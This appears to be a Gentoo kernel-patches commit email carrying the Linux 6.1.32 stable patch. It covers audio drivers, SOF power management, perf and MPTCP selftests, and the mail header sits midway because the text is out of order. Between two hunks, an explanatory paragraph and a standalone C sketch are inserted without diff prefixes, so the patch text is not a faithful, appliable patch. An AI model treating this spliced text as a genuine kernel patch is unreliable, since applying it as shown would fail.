++++ b/sound/pci/hda/hda_intel.c
+@@ -227,6 +227,7 @@ enum {
+ 	AZX_DRIVER_ATI,
+ 	AZX_DRIVER_ATIHDMI,
+ 	AZX_DRIVER_ATIHDMI_NS,
++	AZX_DRIVER_GFHDMI,
+ 	AZX_DRIVER_VIA,
+ 	AZX_DRIVER_SIS,
+ 	AZX_DRIVER_ULI,
+@@ -349,6 +350,7 @@ static const char * const driver_short_names[] = {
+ 	[AZX_DRIVER_ATI] = "HDA ATI SB",
+ 	[AZX_DRIVER_ATIHDMI] = "HDA ATI HDMI",
+ 	[AZX_DRIVER_ATIHDMI_NS] = "HDA ATI HDMI",
++	[AZX_DRIVER_GFHDMI] = "HDA GF HDMI",
+ 	[AZX_DRIVER_VIA] = "HDA VIA VT82xx",
+ 	[AZX_DRIVER_SIS] = "HDA SIS966",
+ 	[AZX_DRIVER_ULI] = "HDA ULI M5461",
+@@ -1743,6 +1745,12 @@ static int default_bdl_pos_adj(struct azx *chip)
+ 	}
+ 
+ 	switch (chip->driver_type) {
++	/*
++	 * increase the bdl size for Glenfly GPUs due to a hardware
++	 * limitation on the hdac interrupt interval
++	 */
++	case AZX_DRIVER_GFHDMI:
++		return 128;
+ 	case AZX_DRIVER_ICH:
+ 	case AZX_DRIVER_PCH:
+ 		return 1;
+@@ -1858,6 +1866,12 @@ static int azx_first_init(struct azx *chip)
+ 		pci_write_config_dword(pci, PCI_BASE_ADDRESS_1, 0);
+ 	}
+ #endif
++	/*
++	 * Fix response write requests not being synced to memory when
++	 * handling the hdac interrupt on Glenfly GPUs
++	 */
++	if (chip->driver_type == AZX_DRIVER_GFHDMI)
++		bus->polling_mode = 1;
+ 
+ 	err = pcim_iomap_regions(pci, 1 << 0, "ICH HD audio");
+ 	if (err < 0)
+@@ -1959,6 +1973,7 @@ static int azx_first_init(struct azx *chip)
+ 			chip->playback_streams = ATIHDMI_NUM_PLAYBACK;
+ 			chip->capture_streams = ATIHDMI_NUM_CAPTURE;
+ 			break;
++		case AZX_DRIVER_GFHDMI:
+ 		case AZX_DRIVER_GENERIC:
+ 		default:
+ 			chip->playback_streams = ICH6_NUM_PLAYBACK;
+@@ -2727,6 +2742,12 @@ static const struct pci_device_id azx_ids[] = {
+ 	{ PCI_DEVICE(0x1002, 0xab38),
+ 	  .driver_data = AZX_DRIVER_ATIHDMI_NS | AZX_DCAPS_PRESET_ATI_HDMI_NS |
+ 	  AZX_DCAPS_PM_RUNTIME },
++	/* GLENFLY */
++	{ PCI_DEVICE(0x6766, PCI_ANY_ID),
++	  .class = PCI_CLASS_MULTIMEDIA_HD_AUDIO << 8,
++	  .class_mask = 0xffffff,
++	  .driver_data = AZX_DRIVER_GFHDMI | AZX_DCAPS_POSFIX_LPIB |
++	  AZX_DCAPS_NO_MSI | AZX_DCAPS_NO_64BIT },
+ 	/* VIA VT8251/VT8237A */
+ 	{ PCI_DEVICE(0x1106, 0x3288), .driver_data = AZX_DRIVER_VIA },
+ 	/* VIA GFX VT7122/VX900 */
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index be2c6cff77011..7b5e09070ab9b 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -4489,6 +4489,22 @@ static int patch_via_hdmi(struct hda_codec *codec)
+ 	return patch_simple_hdmi(codec, VIAHDMI_CVT_NID, VIAHDMI_PIN_NID);
+ }
+ 
++static int patch_gf_hdmi(struct hda_codec *codec)
++{
++	int err;
++
++	err = patch_generic_hdmi(codec);
++	if (err)
++		return err;
++
++	/*
++	 * Glenfly GPUs have two codecs; when a stream switches from one codec
++	 * to another, actual clean-ups are needed in codec_cleanup_stream
++	 */
++	codec->no_sticky_stream = 1;
++	return 0;
++}
++
+ /*
+  * patch entries
+  */
+@@ -4584,6 +4600,12 @@ HDA_CODEC_ENTRY(0x10de00a6, "GPU a6 HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de00a7, "GPU a7 HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de8001, "MCP73 HDMI",	patch_nvhdmi_2ch),
+ HDA_CODEC_ENTRY(0x10de8067, "MCP67/68 HDMI",	patch_nvhdmi_2ch),
++HDA_CODEC_ENTRY(0x67663d82, "Arise 82 HDMI/DP",	patch_gf_hdmi),
++HDA_CODEC_ENTRY(0x67663d83, "Arise 83 HDMI/DP",	patch_gf_hdmi),
++HDA_CODEC_ENTRY(0x67663d84, "Arise 84 HDMI/DP",	patch_gf_hdmi),
++HDA_CODEC_ENTRY(0x67663d85, "Arise 85 HDMI/DP",	patch_gf_hdmi),
++HDA_CODEC_ENTRY(0x67663d86, "Arise 86 HDMI/DP",	patch_gf_hdmi),
++HDA_CODEC_ENTRY(0x67663d87, "Arise 87 HDMI/DP",	patch_gf_hdmi),
+ HDA_CODEC_ENTRY(0x11069f80, "VX900 HDMI/DP",	patch_via_hdmi),
+ HDA_CODEC_ENTRY(0x11069f81, "VX900 HDMI/DP",	patch_via_hdmi),
+ HDA_CODEC_ENTRY(0x11069f84, "VX11 HDMI/DP",	patch_generic_hdmi),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 379f216158ab4..7b5f194513c7b 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7063,6 +7063,8 @@ enum {
+ 	ALC225_FIXUP_DELL1_MIC_NO_PRESENCE,
+ 	ALC295_FIXUP_DISABLE_DAC3,
+ 	ALC285_FIXUP_SPEAKER2_TO_DAC1,
++	ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1,
++	ALC285_FIXUP_ASUS_HEADSET_MIC,
+ 	ALC280_FIXUP_HP_HEADSET_MIC,
+ 	ALC221_FIXUP_HP_FRONT_MIC,
+ 	ALC292_FIXUP_TPT460,
+@@ -8033,6 +8035,22 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC269_FIXUP_THINKPAD_ACPI
+ 	},
++	[ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc285_fixup_speaker2_to_dac1,
++		.chained = true,
++		.chain_id = ALC245_FIXUP_CS35L41_SPI_2
++	},
++	[ALC285_FIXUP_ASUS_HEADSET_MIC] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03a11050 },
++			{ 0x1b, 0x03a11c30 },
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1
++	},
+ 	[ALC256_FIXUP_DELL_INSPIRON_7559_SUBWOOFER] = {
+ 		.type = HDA_FIXUP_PINS,
+ 		.v.pins = (const struct hda_pintbl[]) {
+@@ -9507,6 +9525,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1313, "Asus K42JZ", ALC269VB_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x13b0, "ASUS Z550SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1427, "Asus Zenbook UX31E", ALC269VB_FIXUP_ASUS_ZENBOOK),
++	SND_PCI_QUIRK(0x1043, 0x1473, "ASUS GU604V", ALC285_FIXUP_ASUS_HEADSET_MIC),
++	SND_PCI_QUIRK(0x1043, 0x1483, "ASUS GU603V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
+ 	SND_PCI_QUIRK(0x1043, 0x1683, "ASUS UM3402YAR", ALC287_FIXUP_CS35L41_I2C_2),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index b9958e5553674..84b401b685f7f 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -297,6 +297,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "8A22"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "System76"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "pang12"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/ssm2602.c b/sound/soc/codecs/ssm2602.c
+index cbbe83b85adaf..cf7927222be15 100644
+--- a/sound/soc/codecs/ssm2602.c
++++ b/sound/soc/codecs/ssm2602.c
+@@ -53,6 +53,18 @@ static const struct reg_default ssm2602_reg[SSM2602_CACHEREGNUM] = {
+ 	{ .reg = 0x09, .def = 0x0000 }
+ };
+ 
++/*
++ * ssm2602 register patch
++ * Workaround for playback distortions after power up: activates the digital
++ * core, and then powers on the output, DAC, and whole chip at the same time
++ */
++
++static const struct reg_sequence ssm2602_patch[] = {
++	{ SSM2602_ACTIVE, 0x01 },
++	{ SSM2602_PWR,    0x07 },
++	{ SSM2602_RESET,  0x00 },
++};
++
+ 
+ /*Appending several "None"s just for OSS mixer use*/
+ static const char *ssm2602_input_select[] = {
+@@ -589,6 +601,9 @@ static int ssm260x_component_probe(struct snd_soc_component *component)
+ 		return ret;
+ 	}
+ 
++	regmap_register_patch(ssm2602->regmap, ssm2602_patch,
++			      ARRAY_SIZE(ssm2602_patch));
++
+ 	/* set the update bits */
+ 	regmap_update_bits(ssm2602->regmap, SSM2602_LINVOL,
+ 			    LINVOL_LRIN_BOTH, LINVOL_LRIN_BOTH);
+diff --git a/sound/soc/dwc/dwc-i2s.c b/sound/soc/dwc/dwc-i2s.c
+index 7f7dd07c63b2f..3496301582b22 100644
+--- a/sound/soc/dwc/dwc-i2s.c
++++ b/sound/soc/dwc/dwc-i2s.c
+@@ -132,13 +132,13 @@ static irqreturn_t i2s_irq_handler(int irq, void *dev_id)
+ 
+ 		/* Error Handling: TX */
+ 		if (isr[i] & ISR_TXFO) {
+-			dev_err(dev->dev, "TX overrun (ch_id=%d)\n", i);
++			dev_err_ratelimited(dev->dev, "TX overrun (ch_id=%d)\n", i);
+ 			irq_valid = true;
+ 		}
+ 
+ 		/* Error Handling: TX */
+ 		if (isr[i] & ISR_RXFO) {
+-			dev_err(dev->dev, "RX overrun (ch_id=%d)\n", i);
++			dev_err_ratelimited(dev->dev, "RX overrun (ch_id=%d)\n", i);
+ 			irq_valid = true;
+ 		}
+ 	}
+diff --git a/sound/soc/intel/common/soc-acpi-intel-cht-match.c b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+index 6beb00858c33f..cdcbf04b8832f 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-cht-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+@@ -50,6 +50,31 @@ static struct snd_soc_acpi_mach *cht_quirk(void *arg)
+ 		return mach;
+ }
+ 
++/*
++ * Some tablets with an Android factory OS have buggy DSDTs with an ESSX8316
++ * device in the ACPI tables, even though they are not using an ESS8316 codec.
++ * These DSDTs also have an ACPI device for the correct codec; ignore the ESSX8316.
++ */
++static const struct dmi_system_id cht_ess8316_not_present_table[] = {
++	{
++		/* Nextbook Ares 8A */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "CherryTrail"),
++			DMI_MATCH(DMI_BIOS_VERSION, "M882"),
++		},
++	},
++	{ }
++};
++
++static struct snd_soc_acpi_mach *cht_ess8316_quirk(void *arg)
++{
++	if (dmi_check_system(cht_ess8316_not_present_table))
++		return NULL;
++
++	return arg;
++}
++
+ static const struct snd_soc_acpi_codecs rt5640_comp_ids = {
+ 	.num_codecs = 2,
+ 	.codecs = { "10EC5640", "10EC3276" },
+@@ -113,6 +138,7 @@ struct snd_soc_acpi_mach  snd_soc_acpi_intel_cherrytrail_machines[] = {
+ 		.drv_name = "bytcht_es8316",
+ 		.fw_filename = "intel/fw_sst_22a8.bin",
+ 		.board = "bytcht_es8316",
++		.machine_quirk = cht_ess8316_quirk,
+ 		.sof_tplg_filename = "sof-cht-es8316.tplg",
+ 	},
+ 	/* some CHT-T platforms rely on RT5640, use Baytrail machine driver */
+diff --git a/sound/soc/sof/debug.c b/sound/soc/sof/debug.c
+index ade0507328af4..5042312b1b98d 100644
+--- a/sound/soc/sof/debug.c
++++ b/sound/soc/sof/debug.c
+@@ -437,8 +437,8 @@ void snd_sof_handle_fw_exception(struct snd_sof_dev *sdev, const char *msg)
+ 		/* should we prevent DSP entering D3 ? */
+ 		if (!sdev->ipc_dump_printed)
+ 			dev_info(sdev->dev,
+-				 "preventing DSP entering D3 state to preserve context\n");
+-		pm_runtime_get_noresume(sdev->dev);
++				 "Attempting to prevent DSP from entering D3 state to preserve context\n");
++		pm_runtime_get_if_in_use(sdev->dev);
+ 	}
+ 
+ 	/* dump vital information to the logs */
+diff --git a/sound/soc/sof/pcm.c b/sound/soc/sof/pcm.c
+index 14571b821ecac..be6f38af37b5d 100644
+--- a/sound/soc/sof/pcm.c
++++ b/sound/soc/sof/pcm.c
+@@ -619,16 +619,17 @@ static int sof_pcm_probe(struct snd_soc_component *component)
+ 				       "%s/%s",
+ 				       plat_data->tplg_filename_prefix,
+ 				       plat_data->tplg_filename);
+-	if (!tplg_filename)
+-		return -ENOMEM;
++	if (!tplg_filename) {
++		ret = -ENOMEM;
++		goto pm_error;
++	}
+ 
+ 	ret = snd_sof_load_topology(component, tplg_filename);
+-	if (ret < 0) {
++	if (ret < 0)
+ 		dev_err(component->dev, "error: failed to load DSP topology %d\n",
+ 			ret);
+-		return ret;
+-	}
+ 
++pm_error:
+ 	pm_runtime_mark_last_busy(component->dev);
+ 	pm_runtime_put_autosuspend(component->dev);
+ 
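
The fix converts the early returns into jumps to a single pm_error label so
the runtime-PM reference taken earlier in sof_pcm_probe() is released on
every path, success or failure. A runnable sketch of that single-exit
cleanup pattern, with stand-in names for the PM calls:

#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static int refcount;	/* stand-in for the runtime-PM usage count */

static void pm_get(void) { refcount++; }
static void pm_put(void) { refcount--; }

static int probe(const char *prefix, const char *name)
{
	char *path;
	int ret = 0;

	pm_get();		/* taken at entry, must be balanced below */

	if (asprintf(&path, "%s/%s", prefix, name) < 0) {
		ret = -ENOMEM;
		goto pm_error;	/* a bare return here would leak the ref */
	}

	if (strstr(path, "bad"))	/* stand-in for a topology load error */
		ret = -EINVAL;

	free(path);
pm_error:
	pm_put();		/* balances pm_get() on every exit */
	return ret;
}

int main(void)
{
	int ret = probe("intel/sof-tplg", "sof-bad.tplg");

	printf("probe() = %d, refcount = %d (expect 0)\n", ret, refcount);
	return 0;
}
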
+diff --git a/sound/soc/sof/pm.c b/sound/soc/sof/pm.c
+index 26ffcbb6e30f4..a1bfa5a37e2ad 100644
+--- a/sound/soc/sof/pm.c
++++ b/sound/soc/sof/pm.c
+@@ -159,7 +159,7 @@ static int sof_resume(struct device *dev, bool runtime_resume)
+ 		ret = tplg_ops->set_up_all_pipelines(sdev, false);
+ 		if (ret < 0) {
+ 			dev_err(sdev->dev, "Failed to restore pipeline after resume %d\n", ret);
+-			return ret;
++			goto setup_fail;
+ 		}
+ 	}
+ 
+@@ -173,6 +173,18 @@ static int sof_resume(struct device *dev, bool runtime_resume)
+ 			dev_err(sdev->dev, "ctx_restore IPC error during resume: %d\n", ret);
+ 	}
+ 
++setup_fail:
++#if IS_ENABLED(CONFIG_SND_SOC_SOF_DEBUG_ENABLE_DEBUGFS_CACHE)
++	if (ret < 0) {
++		/*
++		 * Debugfs cannot be read in runtime suspend, so cache
++		 * the contents upon failure. This allows capturing
++		 * possible DSP coredump information.
++		 */
++		sof_cache_debugfs(sdev);
++	}
++#endif
++
+ 	return ret;
+ }
+ 
+diff --git a/sound/soc/sof/sof-client-probes.c b/sound/soc/sof/sof-client-probes.c
+index ddeabbb5580e1..1e521a9e34d27 100644
+--- a/sound/soc/sof/sof-client-probes.c
++++ b/sound/soc/sof/sof-client-probes.c
+@@ -441,12 +441,7 @@ static ssize_t sof_probes_dfs_points_read(struct file *file, char __user *to,
+ 
+ 	ret = sof_probes_points_info(cdev, &desc, &num_desc);
+ 	if (ret < 0)
+-		goto exit;
+-
+-	pm_runtime_mark_last_busy(dev);
+-	err = pm_runtime_put_autosuspend(dev);
+-	if (err < 0)
+-		dev_err_ratelimited(dev, "debugfs read failed to idle %d\n", err);
++		goto pm_error;
+ 
+ 	for (i = 0; i < num_desc; i++) {
+ 		offset = strlen(buf);
+@@ -464,6 +459,13 @@ static ssize_t sof_probes_dfs_points_read(struct file *file, char __user *to,
+ 	ret = simple_read_from_buffer(to, count, ppos, buf, strlen(buf));
+ 
+ 	kfree(desc);
++
++pm_error:
++	pm_runtime_mark_last_busy(dev);
++	err = pm_runtime_put_autosuspend(dev);
++	if (err < 0)
++		dev_err_ratelimited(dev, "debugfs read failed to idle %d\n", err);
++
+ exit:
+ 	kfree(buf);
+ 	return ret;
+diff --git a/tools/perf/builtin-ftrace.c b/tools/perf/builtin-ftrace.c
+index 4bc5b7cf3e04b..1d40f9bcb63bc 100644
+--- a/tools/perf/builtin-ftrace.c
++++ b/tools/perf/builtin-ftrace.c
+@@ -1175,7 +1175,7 @@ int cmd_ftrace(int argc, const char **argv)
+ 	OPT_BOOLEAN('b', "use-bpf", &ftrace.target.use_bpf,
+ 		    "Use BPF to measure function latency"),
+ #endif
+-	OPT_BOOLEAN('n', "--use-nsec", &ftrace.use_nsec,
++	OPT_BOOLEAN('n', "use-nsec", &ftrace.use_nsec,
+ 		    "Use nano-second histogram"),
+ 	OPT_PARENT(common_options),
+ 	};
+diff --git a/tools/testing/selftests/net/mptcp/Makefile b/tools/testing/selftests/net/mptcp/Makefile
+index 43a7236261261..7b936a9268594 100644
+--- a/tools/testing/selftests/net/mptcp/Makefile
++++ b/tools/testing/selftests/net/mptcp/Makefile
+@@ -9,7 +9,7 @@ TEST_PROGS := mptcp_connect.sh pm_netlink.sh mptcp_join.sh diag.sh \
+ 
+ TEST_GEN_FILES = mptcp_connect pm_nl_ctl mptcp_sockopt mptcp_inq
+ 
+-TEST_FILES := settings
++TEST_FILES := mptcp_lib.sh settings
+ 
+ EXTRA_CLEAN := *.pcap
+ 
+diff --git a/tools/testing/selftests/net/mptcp/diag.sh b/tools/testing/selftests/net/mptcp/diag.sh
+index 515859a5168bc..dd730a35bd128 100755
+--- a/tools/testing/selftests/net/mptcp/diag.sh
++++ b/tools/testing/selftests/net/mptcp/diag.sh
+@@ -1,6 +1,8 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ rndh=$(printf %x $sec)-$(mktemp -u XXXXXX)
+ ns="ns1-$rndh"
+ ksft_skip=4
+@@ -25,6 +27,8 @@ cleanup()
+ 	ip netns del $ns
+ }
+ 
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.sh b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+index 621af6895f4d5..c923ce5ff6eb7 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+@@ -1,6 +1,8 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ time_start=$(date +%s)
+ 
+ optstring="S:R:d:e:l:r:h4cm:f:tC"
+@@ -141,6 +143,8 @@ cleanup()
+ 	done
+ }
+ 
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 76a197f7b8132..c7da2bd7c3286 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -6,6 +6,8 @@
+ # address all other issues detected by shellcheck.
+ #shellcheck disable=SC2086
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ ret=0
+ sin=""
+ sinfail=""
+@@ -13,6 +15,7 @@ sout=""
+ cin=""
+ cinfail=""
+ cinsent=""
++tmpfile=""
+ cout=""
+ capout=""
+ ns1=""
+@@ -127,6 +130,8 @@ cleanup_partial()
+ 
+ check_tools()
+ {
++	mptcp_lib_check_mptcp
++
+ 	if ! ip -Version &> /dev/null; then
+ 		echo "SKIP: Could not run test without ip tool"
+ 		exit $ksft_skip
+@@ -164,6 +169,7 @@ cleanup()
+ {
+ 	rm -f "$cin" "$cout" "$sinfail"
+ 	rm -f "$sin" "$sout" "$cinsent" "$cinfail"
++	rm -f "$tmpfile"
+ 	cleanup_partial
+ }
+ 
+@@ -358,9 +364,16 @@ check_transfer()
+ 			fail_test
+ 			return 1
+ 		fi
+-		bytes="--bytes=${bytes}"
++
++		# note: BusyBox's "cmp" command doesn't support --bytes
++		tmpfile=$(mktemp)
++		head --bytes="$bytes" "$in" > "$tmpfile"
++		mv "$tmpfile" "$in"
++		head --bytes="$bytes" "$out" > "$tmpfile"
++		mv "$tmpfile" "$out"
++		tmpfile=""
+ 	fi
+-	cmp -l "$in" "$out" ${bytes} | while read -r i a b; do
++	cmp -l "$in" "$out" | while read -r i a b; do
+ 		local sum=$((0${a} + 0${b}))
+ 		if [ $check_invert -eq 0 ] || [ $sum -ne $((0xff)) ]; then
+ 			echo "[ FAIL ] $what does not match (in, out):"
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_lib.sh b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+new file mode 100644
+index 0000000000000..3286536b79d55
+--- /dev/null
++++ b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+@@ -0,0 +1,40 @@
++#! /bin/bash
++# SPDX-License-Identifier: GPL-2.0
++
++readonly KSFT_FAIL=1
++readonly KSFT_SKIP=4
++
++# SELFTESTS_MPTCP_LIB_EXPECT_ALL_FEATURES env var can be set when validating all
++# features using the latest version of the kernel and the selftests to make sure
++# a test is not being skipped by mistake.
++mptcp_lib_expect_all_features() {
++	[ "${SELFTESTS_MPTCP_LIB_EXPECT_ALL_FEATURES:-}" = "1" ]
++}
++
++# $1: msg
++mptcp_lib_fail_if_expected_feature() {
++	if mptcp_lib_expect_all_features; then
++		echo "ERROR: missing feature: ${*}"
++		exit ${KSFT_FAIL}
++	fi
++
++	return 1
++}
++
++# $1: file
++mptcp_lib_has_file() {
++	local f="${1}"
++
++	if [ -f "${f}" ]; then
++		return 0
++	fi
++
++	mptcp_lib_fail_if_expected_feature "${f} file not found"
++}
++
++mptcp_lib_check_mptcp() {
++	if ! mptcp_lib_has_file "/proc/sys/net/mptcp/enabled"; then
++		echo "SKIP: MPTCP support is not available"
++		exit ${KSFT_SKIP}
++	fi
++}
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+index 80d36f7cfee8a..08d8533c98c45 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+@@ -1,6 +1,8 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ ret=0
+ sin=""
+ sout=""
+@@ -81,6 +83,8 @@ cleanup()
+ 	rm -f "$sin" "$sout"
+ }
+ 
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"
+diff --git a/tools/testing/selftests/net/mptcp/pm_netlink.sh b/tools/testing/selftests/net/mptcp/pm_netlink.sh
+index 89839d1ff9d83..32f7533e0919a 100755
+--- a/tools/testing/selftests/net/mptcp/pm_netlink.sh
++++ b/tools/testing/selftests/net/mptcp/pm_netlink.sh
+@@ -1,6 +1,8 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ ksft_skip=4
+ ret=0
+ 
+@@ -34,6 +36,8 @@ cleanup()
+ 	ip netns del $ns1
+ }
+ 
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"
+diff --git a/tools/testing/selftests/net/mptcp/simult_flows.sh b/tools/testing/selftests/net/mptcp/simult_flows.sh
+index 40aeb5a71a2a6..4a417f9d51d67 100755
+--- a/tools/testing/selftests/net/mptcp/simult_flows.sh
++++ b/tools/testing/selftests/net/mptcp/simult_flows.sh
+@@ -1,6 +1,8 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ rndh=$(printf %x $sec)-$(mktemp -u XXXXXX)
+ ns1="ns1-$rndh"
+ ns2="ns2-$rndh"
+@@ -33,6 +35,8 @@ cleanup()
+ 	done
+ }
+ 
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index ad6547c79b831..084a2b0a197ec 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -1,6 +1,10 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-05 11:48 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-05 11:48 UTC (permalink / raw
  To: gentoo-commits

commit:     2ff50bda111e1adfbafd70658521dcaf0e8537ef
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Jun  5 11:48:34 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Jun  5 11:48:34 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2ff50bda

Linux patch 6.1.32

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1031_linux-6.1.32.patch | 2421 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2425 insertions(+)

diff --git a/0000_README b/0000_README
index f6e14669..a242f865 100644
--- a/0000_README
+++ b/0000_README
@@ -163,6 +163,10 @@ Patch:  1030_linux-6.1.31.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.31
 
+Patch:  1031_linux-6.1.32.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.32
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1031_linux-6.1.32.patch b/1031_linux-6.1.32.patch
new file mode 100644
index 00000000..f4ef09a2
--- /dev/null
+++ b/1031_linux-6.1.32.patch
@@ -0,0 +1,2421 @@
+diff --git a/Makefile b/Makefile
+index 902a6b598c73b..a0c3d8809e93a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 31
++SUBLEVEL = 32
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/block/blk-map.c b/block/blk-map.c
+index 34735626b00f3..66da9e2b19abf 100644
+--- a/block/blk-map.c
++++ b/block/blk-map.c
+@@ -246,7 +246,7 @@ static struct bio *blk_rq_map_bio_alloc(struct request *rq,
+ {
+ 	struct bio *bio;
+ 
+-	if (rq->cmd_flags & REQ_POLLED) {
++	if (rq->cmd_flags & REQ_POLLED && (nr_vecs <= BIO_INLINE_VECS)) {
+ 		blk_opf_t opf = rq->cmd_flags | REQ_ALLOC_CACHE;
+ 
+ 		bio = bio_alloc_bioset(NULL, nr_vecs, opf, gfp_mask,
+diff --git a/block/blk-mq-tag.c b/block/blk-mq-tag.c
+index 9eb968e14d31f..a80d7c62bdfe6 100644
+--- a/block/blk-mq-tag.c
++++ b/block/blk-mq-tag.c
+@@ -41,16 +41,20 @@ void __blk_mq_tag_busy(struct blk_mq_hw_ctx *hctx)
+ {
+ 	unsigned int users;
+ 
++	/*
++	 * calling test_bit() prior to test_and_set_bit() is intentional;
++	 * it avoids dirtying the cacheline if the queue is already active.
++	 */
+ 	if (blk_mq_is_shared_tags(hctx->flags)) {
+ 		struct request_queue *q = hctx->queue;
+ 
+-		if (test_bit(QUEUE_FLAG_HCTX_ACTIVE, &q->queue_flags))
